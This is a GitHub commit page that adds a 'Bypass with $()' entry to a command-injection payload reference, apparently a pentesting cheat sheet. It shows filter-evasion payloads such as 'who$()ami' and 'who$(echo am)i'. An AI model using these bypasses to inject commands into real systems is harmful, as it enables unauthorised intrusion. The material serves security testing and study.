Skip to content

Commit

Permalink
added new bypass
Browse files Browse the repository at this point in the history
  • Loading branch information
xplo1t-sec committed Mar 30, 2022
1 parent 89f0b93 commit 8a5e01f
Showing 1 changed file with 7 additions and 0 deletions.
7 changes: 7 additions & 0 deletions Command Injection/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -18,6 +18,7 @@
* [Bypass with double quote](#bypass-with-double-quote)
* [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
* [Bypass with $@](#bypass-with-)
* [Bypass with $()](#bypass-with-$())
* [Bypass with variable expansion](#bypass-with-variable-expansion)
* [Bypass with wildcards](#bypass-with-wildcards)
* [Challenge](#challenge)
Expand Down Expand Up @@ -209,6 +210,12 @@ echo $0
echo whoami|$0
```

### Bypass with $()
```powershell
who$()ami
who$(echo am)i
```

#### Bypass with variable expansion

```powershell
Expand Down

0 comments on commit 8a5e01f

Please sign in to comment.